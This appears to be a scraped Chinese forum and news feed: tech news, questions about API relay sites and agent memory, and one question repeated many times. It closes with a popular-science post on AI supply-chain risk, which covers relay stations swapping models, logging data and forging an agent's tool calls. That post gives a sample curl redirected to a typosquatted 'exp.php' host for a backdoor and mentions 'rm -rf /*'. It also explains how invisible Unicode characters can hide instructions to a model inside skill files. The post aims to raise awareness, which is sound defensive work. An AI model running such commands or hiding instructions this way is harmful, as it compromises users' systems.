应该是要进入全面花LDC买站甚至可能需要买额度的阶段了我感觉 因为这波进来很多新人 最近想买优质公益站的邀请码 哪些佬的站必入啊。。目前ANY L最帅 那个男神 E站这些都有貌似还在营业不过可能不咋稳定 佬们觉得哪些值得必入啊。。意向 久 黑与白 冰老 小丑等 不知道还有老牌持续经营的嘛?要是也都用不了的情况先蹲HUB也是个路子了。。 5 个帖子 - 4 位参与者 阅读完整话题
大家一般用什么方式浏览全球新闻呢? 客观点的、全面点的、真实点的、及时点的、中文友好的平台有推荐吗?
大家一般用什么方式浏览全球新闻呢? 客观点的、全面点的、真实点的、及时点的、中文友好的平台有推荐吗?
大家一般用什么方式浏览全球新闻呢? 客观点的、全面点的、真实点的、及时点的、中文友好的平台有推荐吗?
大家一般用什么方式浏览全球新闻呢? 客观点的、全面点的、真实点的、及时点的、中文友好的平台有推荐吗?
大家一般用什么方式浏览全球新闻呢? 客观点的、全面点的、真实点的、及时点的、中文友好的平台有推荐吗?
大家一般用什么方式浏览全球新闻呢? 客观点的、全面点的、真实点的、及时点的、中文友好的平台有推荐吗?
大家一般用什么方式浏览全球新闻呢? 客观点的、全面点的、真实点的、及时点的、中文友好的平台有推荐吗?
大家一般用什么方式浏览全球新闻呢? 客观点的、全面点的、真实点的、及时点的、中文友好的平台有推荐吗?
目前想基于一个github项目进行二开,有以下几点需求: 1、首先对项目进行全面的审计,起码要搞清楚每个文件是干嘛的,细致到系统函数最好,重点是新会话不需要重新读源码就能知道每个文件是干嘛的,因为需要改动的部分比较多,一个会话肯定搞不完。 2、能否有一个需求任务进度追踪skills,就是基于我的需求进行更细致的拆分,然后记录了这个会话完成了哪些需求,修改了哪些文件,便于新会话接着这个进度继续。 3、现在佬们都用什么记忆系统,用了一些要么觉得太重,要么占用会话上下文太多,要么触发时机,记录内容不太符合自身需求。 1 个帖子 - 1 位参与者 阅读完整话题
当下全球绝大多数车企都在加速向纯电汽车赛道转型,丰田品牌的管理层却依旧在公开场合表态坚持内燃机也就是燃油车的发展路线,和主流行业趋势站在了对立面。 近日丰田董事长丰田章男在接受媒体采访时公开表态,现在整个行业里站出来支持内燃机路线的从业者越来越少,这绝对不是行业健康发展的好信号,他本人对全行业一窝蜂全面转向纯电汽车的不理智跟风行为感到非常失望。 作为连续第六年拿下全球汽车销量冠军的头部车企,丰田目前在纯电赛道的推进节奏始终保持相对保守谨慎的态度,尽管近期推出的C-HR、Urban Cruiser和汉兰达等全新车型都体现出品牌正在加大电动化布局的力度,但其纯电业务在整体销量盘子里的占比依旧十分有限。 丰田章男早前就公开判断,未来纯电车型在全球汽车总销量里的占比永远不会超过三成。 他还指出全球还有大量欠发达地区,当地公共充电基础设施的配套完全跟不上,燃油车在这类市场依旧是用户的刚性刚需,完全没有必要一刀切推进全电动化。 丰田章男对纯电汽车的抵触态度早就不是行业秘密,过往他不止一次在公开场合提出,纯电汽车的全生命周期排放并没有大众想象的环保,还直接表态如果丰田全面转向纯电路线,整个产业链会有大量日本本土从业者直接失去工作。 而摆在眼前的市场现实已经给出了最直接的反馈,整体在纯电赛道进度落后的日系汽车品牌,在新能源渗透率极高的中国市场的整体销量已经连续多个季度持续下滑,就是这套保守路线市场反馈的最直观例证。 查看评论
美国白宫近日敦促英国政府不要对16岁以下未成年人实施社交媒体全面禁令,称此类限制措施可能对美国科技企业构成“不成比例的”合规负担。 在向英国政府就“在线安全”咨询提交的意见中,美国政府明确反对通过“一刀切的政府规定”和“生硬的监管工具”来应对儿童在互联网上面临的风险。 相关意见通过美国驻英国大使馆对外公布。 在这份意见中,美方指出,对13至16岁用户实施更严格“年龄门槛”的方案在技术上难以奏效,认为目前用于区分未成年人和成年用户的技术手段,无法简单下移以应对更低年龄段的限制要求。 白宫主张,英国应为家长提供更强大的工具,以管理孩子账户的隐私设置和使用控制,并要求平台为未成年人提供“健康的在线体验”,而不是采取“彻底封禁”的做法。 近年来,英国在在线安全领域的立法路径已成为白宫与唐宁街之间的一个紧张点,其中尤以《在线安全法》引发的争议最为突出。 这部法律因被批评威胁言论自由而遭到来自大西洋彼岸的强烈质疑,一些美国政界人士甚至将其称为英国的“网络审查法”。 美国副总统JD·万斯此前就曾表示,英国的言论自由“正在倒退”。 英国首相基尔·斯塔默预计将于下周宣布对“有害”社交媒体应用采取禁令,同时推出一揽子更为严格的限制措施。 这些措施可能包括在游戏平台上屏蔽与陌生人的聊天功能,并考虑限制未成年人使用人工智能聊天机器人。 目前尚不清楚哪些应用会被认定为“有害”,但预计“教育类”平台将获得豁免,有报道称 YouTube Kids 或有望不在禁令之列。 作为参照,一些国家已走在前面,例如澳大利亚对16岁以下群体实施了覆盖所有社交平台的“全面禁用”,TikTok、Facebook、Instagram 和 Snapchat 等应用均被列入封锁范围。 白宫对英国及欧盟近年在监管路线上趋于“定向针对”美国科技公司的趋势表示担忧。 美国驻英使馆在意见中指出,美方对那些“给美国公司施加不成比例合规负担,或只针对某一类平台而对类似服务网开一面”的监管做法持保留态度。 与此同时,英国政府强调,将加快推进此次在线安全咨询结论的落地,力求在“有效、可执行”的前提下,更好保护儿童安全。 政府发言人表示,内阁“决心迅速行动”,但也会确保相关措施切实可行。 有消息称,相关部长们同样意识到在程序上可能面临司法复核的风险,因此在推进节奏和细节设计上颇为审慎。 在行业层面,围绕《在线安全法》的司法争议已经展开。 Facebook 和 Instagram 的母公司 Meta 正就该法案的一项执行机制提起司法复核,向英国媒体监管机构发起法律挑战。 争议焦点在于监管机构依据该法所制定的收费与罚款制度,Meta 认为其在具体执行上存在不当之处。 随着白宫明确表达立场以及科技巨头采取法律行动,英国针对未成年人社交媒体使用的监管走向,正日益成为横跨政策、外交与产业多方博弈的焦点议题。 查看评论
6月9日消息,网传某校园内菜鸟驿站发布公告,宣布菜鸟驿站原有运行系统(含菜鸟APP)将逐步退出运行,全面并入淘宝体系,未来用户取件服务将统一通过淘宝APP入口完成。 公告显示,因菜鸟驿站已完全纳入淘宝系统,菜鸟驿站原有运行系统(包括菜鸟APP)将逐步退出运行。在过渡阶段,淘系身份码将会取代菜鸟APP身份码与支付宝身份码,直至菜鸟系统完全终止运行。 淘宝APP首页显示,用户可从“菜鸟驿站”入口直接跳转菜鸟页面,无需再单独打开菜鸟APP。 公开信息显示,菜鸟驿站是阿里巴巴旗下菜鸟网络科技有限公司于2013年推出的数字社区生活服务品牌,通过整合快递企业、便利店等资源构建覆盖社区及校园的末端物流网络,提供包裹代收、自提、上门、团购、回收、洗衣等服务。截至2024年,已建成超4万个城市站点,并在全国高校设立1000余个校园驿站。 查看评论
没刚开始考虑的全全面了,还会偷懒,自己检查也不检查,上下文联系不起来,我都怀疑是不是我的上下文太长了 3 个帖子 - 3 位参与者 阅读完整话题
IT之家 6 月 9 日消息,据《科创板日报》今日报道, 曹操出行计划组建独立 AI 事业部,全面推进公司 AI 战略落地,完成从移动互联网公司到 AI 原生公司的关键转型 。 报道还提到,曹操出行近期已在招聘平台上线“首席 AI 官”岗位,岗位职责包括:制定 AI 战略与技术路线、构建 AI 核心能力体系、推动业务全链路 AI 赋能等。 公开资料显示,曹操出行创立于 2015 年 5 月 21 日,是吉利控股集团布局“新能源汽车共享生态”的战略性投资业务,是一家共享出行平台,目前有曹操网约车、曹操汽车、曹操顺风车等业务。 ▲ 曹操 60 汽车 据IT之家此前报道, 曹操出行 3 月 27 日发布上市后首份年报 。2025 年总收入 202 亿元再创新高,同比增长 37.7%;2025 年毛利额 18.9 亿元,同比增长 59.3%;2025 年毛利率 9.4%,同比提升 1.3 个百分点,实现第四季度调整后净利转正。 2025 年曹操出行业务版图持续扩张,截至 2025 年 12 月 31 日服务覆盖国内 195 个城市;平均月活用户数 4130 万,同比增长 43.9%;平均月活司机 63.1 万,同比增长 35.4%。 曹操出行还在年报中提到 Robotaxi 转型全面提速,全球化布局稳步推进,Robotaxi 已部署超 100 辆,启用全球首座“绿色智能通行岛”,与阿布扎比投资办公室战略合作将在当地建立海外公司。 2026 年, 曹操出行完全定制 Robotaxi 亮相 ,2027 年开始量产;逐步将 Robotaxi 业务拓展至更多城市;在国际市场部署 Robotaxi,在香港探索 Robotaxi 业务发展。
在 2026 年 WWDC 开幕主题演讲上,苹果正式发布下一代 Mac 操作系统 macOS 27,内部代号“Golden Gate(金门)”,重点强调性能优化、改进版 Siri,以及对现有界面的迭代升级。 新系统延续了 2025 年首次引入的 Liquid Glass(液态玻璃)视觉风格,并针对此前部分用户的批评进行了调整,同时在底层架构上做出了重要取舍——彻底停止对英特尔处理器 Mac 的支持。 相比于此前带来大改版界面的 macOS Tahoe,macOS Golden Gate 在表面上并非一次“翻天覆地”的更新,更接近在现有设计语言上的深化与打磨。 苹果继续坚持 Liquid Glass 的整体视觉走向,没有回退到旧设计风格,而是在保留透明、层次感等元素的同时,对部分被诟病的细节做出修正,例如侧边栏等界面区域获得了重新设计,以提升可读性和实用性。 更具标志性的是,本次版本在硬件支持策略上被形容为“划清界线”的一次更新。 苹果选择借由 macOS Golden Gate 正式终结英特尔 Mac 的支持历史:自该系统在 9 月或 10 月面向公众正式发布起,将不再有任何英特尔处理器的 Mac 机型获得新系统支持,相关新功能也将完全围绕 Apple Silicon 架构展开。 报道回顾称,自苹果约六年前启动从英特尔向自研芯片迁移以来,英特尔机型已经逐步无法使用部分新特性,如今则是彻底退出更新序列,被认为是“迟早要来的变化”。 在性能与稳定性方面,文章提醒用户警惕测试版系统的风险。 按照以往惯例,苹果会在正式版本发布前的最后阶段集中进行性能调优,因此今日面向开发者提供的首个 macOS Golden Gate 测试版尚未完成省电和性能优化工作,例如当前版本可能会更快耗尽 MacBook 电池电量。 由于测试版不可避免地存在漏洞和兼容性问题,作者强调除开发者必须在测试环境中验证应用外,一般用户不应在工作主力机上安装测试版系统,以免影响正常使用甚至造成数据风险。 尽管 macOS 27“金门”在界面层面不像 Big Sur 或 Tahoe 那样具备强烈的视觉冲击力,但在平台策略和底层方向上却具有重要意义。 苹果一方面通过持续迭代 Liquid Glass 设计和提升 Siri 等功能,为 Apple Silicon Mac 打造更完整的生态体验;另一方面,则以停止支持英特尔 Mac 为节点,进一步巩固其自家芯片平台的主导地位。 查看评论
刚注册的team bug号全部失效,各位的如何? 3 个帖子 - 3 位参与者 阅读完整话题
接入文档再 https://developers.weixin.qq.com/miniprogram/dev/ai/guide.html . 不知道各位做国内小程序的朋友,感觉是利好还是利空啊? 2 个帖子 - 2 位参与者 阅读完整话题
当大学教育全面接入 AI 系统,接下来会发生什么?2025 年 2 月,美国加州州立大学(CSU)与 OpenAI 达成了一项 1,690 万美元的合作协议。OpenAI 向该高校系统内超过 50 万名学生和教职员工开放 ChatGPT Edu,这也是全球单一机构最大规模部署的 ChatGPT 应用。 一场美国大学史上最大的 AI 实验由此开启,AI 开始在校园里扮演一系列新角色:图书馆里出现了 AI 管理员,职业中心用 AI 指导学生求职,教学、课堂以及毕业典礼的流程中都融入了 ChatGPT ,数字分身还代替校长在迎新典礼中致辞和交流…… 但这项计划也引起了很多教职工的反对,他们担心 AI 迟早会代替人类,进一步加剧教育危机。学生们也对这项计划充满疑惑,他们不知道 AI 对自己的学习和成长究竟能起到怎样的作用。尽管如此,CSU 近日仍与 OpenAI 签订了每年 1,300 万美元、为期三年的新协议。 一个值得深思的问题是:AI 到底是帮助学生更好发展的利器,还是让他们丧失了批判性思维能力? 美国大学开启最大 AI 实验 CSU 启动的这项人工智能计划项目,覆盖其 23 个分校、46 万名学生和 6.3 万名教职工。作为全美最大的四年制公立高等教育系统,它希望通过这项计划帮助它成为全美规模最大的人工智能驱动型公立大学系统。 作为 CSU 中历史最悠久的校区,圣何塞州立大学不仅率先设立了专职的 AI 图书馆管理员,还设立了面向公众和师生的 AI 教育与创新协作空间——公民与社会公益人工智能中心。 2025 年秋季,该校发布了“人工智能无处不在”(AI Everywhere)战略,将 AI 素养培训作为新生入学的一项必修课。该校商学院为高中生开设了 AI 训练营,Adobe 公司为 AI 职业发展中心提供了赞助。此外,AI 助手还帮助协调毕业典礼的各项事宜。更有意思的是,校长在迎新典礼上使用 AI 数字分身致辞,并与新生、家长和校友交流。 AI 技术的发展有可能打开未来就业市场的新局面,根据最近的一份报告预测,全美约有 40% 的应届大学毕业生处于就业不足的状态。CSU 系统的学生大部分是第一代移民或家中第一个大学生,在 CSU 看来,AI 将是推动工薪阶层学生跟上 AI 经济发展步伐的关键动力。 加利福尼亚州具有人工智能教育试验田的天然条件,许多全球大型科技公司总部就设立在该州,加州政府也为 AI 的发展提供了支持和助力。2025 年 8 月,加州州长 Gavin Newsom 与 Adobe、Google、IBM 和微软宣布了一项教育合作协议,每家公司将向加州高校免费提供人工智能资源,旨在通过培训高中生、社区大学学生和 CSU 的学生使用 AI,逐步建设未来的人工智能人才队伍。 一边裁员,一边买AI:高校为何爆发反对声 根据合作协议,CSU 与 OpenAI 的此前的合作协议将于今年 6 月 30 日到期,本次新签约的是每年 1,300 万美元、为期三年的新协议。引进 AI 技术作为校园体系的一部分,尽管愿景美好,但让人意外的是这项计划引发了 CSU 教职工的强烈反对。 教职工联名的请愿书指出,部分原因是教职工认为,除了隐私和安全功能外,ChatGPT Edu 与免费在线版 ChatGPT 并无本质区别。此外,全面使用 AI 系统还涉及到学术诚信和公平使用的问题。“尽管系统名为 ChatGPT Edu,但它是一个通用聊天机器人,并非为教育而设计、训练或优化。” 实际上,教职员工正面临着一种两难的局面:一方面,CSU 正面临 23 亿美元的资金缺口,大量教职人员面临被裁,在过去两年中,旧金山州立大学已裁员了 615 个讲师职位。有的学校整个学术部门已被关闭,学费上涨 6%。 (来源:CSU 校区) 资金投入的优先级问题是教职工反对与 OpenAI 签约的关键因素之一。他们认为,预算应该用在支持教职员工方面,但显然,CSU 的选择与他们的预期截然相反,将预算优先投入在 AI 技术。 他们在联名请愿书中写道:“我们相信,投资于 CSU 的人力资源是确保加州公立教育科研、教学和学习质量的最佳途径。我们在高等教育领域面临的挑战无法通过人工智能解决。相反,我们必须赋能教职员工和学生,共同为 CSU 构建一个可持续发展、以人为本的未来。” 目前,CSU 已激活了约一半的 ChatGPT 许可证,也就是说,学校至少已支付了数万个账户的相关费用。一边是财政赤字,一边是对 AI 技术的大力投入,因此有人认为这种行为“荒谬至极”。 另一方面,该计划并未提前与教职工协商。尽管学校并没有强制教职工使用,但明确提出“拒绝将人工智能融入课程如同逆流而上”,因此教职工更多的是被动地使用 AI,他们害怕失去工作,同时不知道 AI 到底能帮助在教学和研究中做什么。 更重要的问题:教育还剩下什么? 反对的声音引起了 CSU 的重视。近期,学校对超过 94,000 名学生和教职工进行的一项调查结果显示,52% 的教授认为 AI 对他们的教学产生了负面影响,67% 的学生认为没有人教他们如何有效地使用 AI。 在系统使用政策方面的规定并不明确。CSU 在一个名为“人工智能共享平台”(AI Commons)的网站上提供工具和培训,但同时将聊天机器人的使用方式交由各校自行决定。但这些资源似乎并未落实,根据相关数据,截至今年 4 月,仅 0.7% 的学生和 16% 的教职工完成了自愿培训。 一个实际的问题是,如果学生在提交作业中使用 AI,那么如何去界定学生在其中的贡献?在教学中,不同的教授做出了不同的选择:一些教授担心学生过度使用 ChatGPT Edu,采用了一种使用答题卡和答题册的课堂考试方式,或使用 AI 检测工具来识别 AI 生成的作业。与此同时,也有一些教授将 ChatGPT Edu 纳入课程体系,他们允许学生用 AI 完成作业,并要求提交使用 AI 的聊天记录。 但这没有减少教职工和学生对 AI 在课程中的应用的困惑。CSU 一位教授在接受媒体采访时,直接指出了矛盾的本质:引入 AI 技术的本意是辅助教学或研究工作,但是这同时也相当于埋下一个隐性的“炸弹”——AI 会不会取代教授的教学和研究工作? 采用 AI 在一定程度上帮助 ChatGPT Edu 提升了在公共教育生态系统中的地位,而这背后的原因是,高校将公共资金投入到一家私营营利性公司,而这家公司的主要产品反过来又可能导致许多纳税人失业。 (来源:ChatGPT Edu) 从各方反应来看,CSU 的人工智能计划反映的一场机构身份认同的危机,也是一场关于公共教育本质意义的辩论。当学生、教职人员对培养下一代社会建设者所需要的能力,以及四年后的 AI 经济缺乏清晰的认知,又何从谈起如何培养呢? 抗议并没有阻止 AI 进入校园,随着协议即将到期,CSU 再次与 OpenAI 续签了新协议。此外,ChatGPT Edu 还与多所高校签订了相关协议,包括牛津大学、德克萨斯大学奥斯汀分校和宾夕法尼亚大学沃顿商学院等。 但真正悬而未决的问题是:当大学越来越像技术平台,这到底是教育的升级,还是它正在让教育失去自己的灵魂?谁又该为这场 AI 实验的结果负责? 参考资料: 1.https://www.nytimes.com/2026/06/01/magazine/ai-university-college-california.html 2.https://openai.com/index/openai-and-the-csu-system/ 3.https://www.govtech.com/education/higher-ed/san-jose-state-university-creates-ai-librarian-position 4.https://www.insidehighered.com/news/tech-innovation/artificial-intelligence/2026/03/27/faculty-push-back-against-openai-deals 5.https://www.kpbs.org/news/education/2026/05/01/cal-state-struck-a-deal-with-openai-some-students-and-faculty-refuse-to-use-it 查看评论
原本的计划是全面的科普一下普通人会遇到的一些AI安全问题,还包括提示词注入,RAG投毒等。但是最近实在感觉精疲力竭,没有什么精力去研究了,于是产生了这篇半途而废版,如果有看完的佬友应该能发现从SKILL那里就已经是不想写了。就放搞七捻三了。就当一个小科普吧,大家当个故事看 引言 随着大模型技术的快速发展,与之相关的技术生态也在不断壮大。MCP、RAG、Skill 这些概念越来越频繁地出现在我们的视野中,甚至逐渐变得日常。如今,不止是程序员,几乎所有接触互联网的人,都开始慢慢使用豆包、元宝这类 ChatBot。前段时间 OpenClaw(龙虾)的爆火,掀起了一股“养虾潮”,也让“Agent”这个词走进了更多人的认知。现在,Codex、Claude Code 等工具几乎成为一线网络相关从业人员的标配,覆盖了短视频从业者、金融从业者,甚至老师和普通学生。然而,随着 Agent 的普及,AI 供应链的安全问题也必须进入我们的视野——因为这关乎到我们每一个人的安全。 本文将围绕着我们普通人将会接触到的一些ai供应链的安全问题所展开。 一、AI中转站安全 AI中转站可能是普通人使用AI最先接触到的东西。 发生原因 大家都知道ai好用,但是随着我们对ai的依赖的深化,token的消耗也在呈指数级上升(特别是国外模型),所以此时对于AI的使用发生了这几个问题: token费用难以承受,日常成本正在提高 对于海外模型还存在网络问题,开发、日常体验的感受大打折扣 账号存在一定的封号问题 基于以上的问题,我们在ai时代出现了一种新的商业组织—— 中转站 中转站的出现为我们提供了很多的便利:价格低、国内直连所以速度快,稳定。但是与此同时,它的背后也藏着我们看不到的风险。 中转站为什么会有风险,总体来说就是由于中转站处于用户和上游API之间的中间桥段,我们和AI公司之间所有的通信都要经过它,所以这之间的一切,理论上他都拥有绝对控制权。 核心危险汇总 中转站的危险主要有以下方面: 数据泄露 、 模型造假 、 命令执行(工具调用伪造) 模型造假 这是我们最先会想到的,大部分人可能都有这种担心。很遗憾,关于模型的真假,确实只能凭中转站的良心了。 因为实现方法太简单了。 # 用户请求中的 model 字段 {"model": "claude-opus-4.7", "messages": [...]} # 中转站转发时替换为 {"model": "deepseek-v4-flash", "messages": [...]} 中转站只要在这个不起眼的model字段做一个小小的改动,你以为的opus4.7实际请求的就是deepseek了。中间相差的价格各位都应该清楚。 这对于非重度使用的人来说几乎无法发现,甚至经常使用的人可能说:”opus的风格这么独特,换成deepseek我怎么可能看不出来“。现在大家应该都听过skill吧,加上 前任.skill 它就能模仿你前任的语气,那如果给deepseek加上 claude.skill 呢? 数据泄露 中转站处于通信的中心节点,可以无条件看到并记录所有双向交互数据: (图片来自 【AI供应链威胁】API 中转站投毒的攻击链深入分析 ) 可以看到,在我们使用AI的过程中,所有的请求和响应中转站都是可以无条件查看的,应该所有流量都要经过它,过程中中转站利用脚本监控日志的方式可以轻松实现任意信息的转存,甚至修改。 这些情况我们作为用户是完全没有办法察觉的。 造成的后果 : 敏感资产暴露, .env 文件、项目账号密码 等明文暴露。 长期使用导致画像暴露,攻击者通过长期收集信息,完善整个项目流程,方便后续对业务进行白盒攻击 实际演示: 命令执行(工具调用伪造) 这是最危险,危害最大的攻击。 事想一下你在你的服务器上部署了claude code,并且调用了中转站的api,你让它去做其他合法请求请求的过程中: curl -i -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" \ -H "Accept: text/html,application/xhtml+xml" \ -H "Accept-Language: zh-CN,zh;q=0.9" \ http://baidu.com # 被换成了 curl -i -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" \ -H "Accept: text/html,application/xhtml+xml" \ -H "Accept-Language: zh-CN,zh;q=0.9" \ http://baidv.com/exp.php 如此长的命令,你真的会发现吗,此时你点击了 “yes” ,也就意味着你的服务器已经被植入了后门。 更别说你让他执行一些删除文件的操作时给你执行 rm -rf /* 了。 他造成的后果: 任意命令执行: Agent 通常具备本地系统或开发环境的读写权限。在自动执行、弱确认或用户误确认的场景下,可能导致本地命令执行。 越权与长期控制: 如果伪造的指令包含下载恶意脚本或建立外部网络连接,这种行为风险将直接演变为系统被远控(GetShell)或植入长期后门,导致机器沦为肉鸡。 二、SKILL投毒 大家平时都会使用来自各种来源的skill提高自己的效率,但是其实skill也会存在投毒的情况。甚至可以让你看不到 这里举一个简单的例子: 你可能说你看一下SKILL.md就看到了。 你完全发现不了。因为这涉及到一种 Unicode隐藏字符 的技术。大概的原理就是使用了一些在大部分编辑器下是不可见字符的Unicode编码。导致我们肉眼是看不到的,但是LLM是可以看见的: 关于更多技术原理就不多说了,本文仅作为科普。感兴趣可以自行查看 【AI供应链威胁】Unicode隐藏指令Skills后门的实践与思考 我这个案例大家复现不一定成果,因为我用了opus4.6(且不一定保真),而且做了很多实验才偶尔成功。但是这里想说的是,我这个投毒是非常明显,赤裸裸的写出来了命令执行。那如果稍加修饰,引入更多提示词注入技术,还有利用远程服务器,以curl的形式命令执行,并且放在一个非常复杂的skill文件中,那么隐蔽性危害就可想而知了 这里有一个网站给大家,可以自查一下,我也是用它制作的SKILL。 embracethered.com ASCII Smuggler - Crafting Invisible Text and Decoding Hidden Secret - Embrace... Convert ASCII text into invisible Unicode encodings using Unicode Tags, Variant Selectors, and Sneaky Bits, and decode hidden messages. 效果: 把文本张贴进去就会自动检测是否有隐藏unicode字符,点击 Encode & Copy 就会编码并自动复制,然后张贴进SKILL.md就好了。 当然这是一种比较少见的绕过检测的技术,大部分就是直接明文写入,只是隐藏的比较好,大家多注意野生SKILL不要随便用即可。 三、MCP投毒 其实mcp和skill同理,会隐藏一些提示词,这里就放个案例吧 截图来自 悬镜-2025开源供应链投毒分析技术报告 9 个帖子 - 5 位参与者 阅读完整话题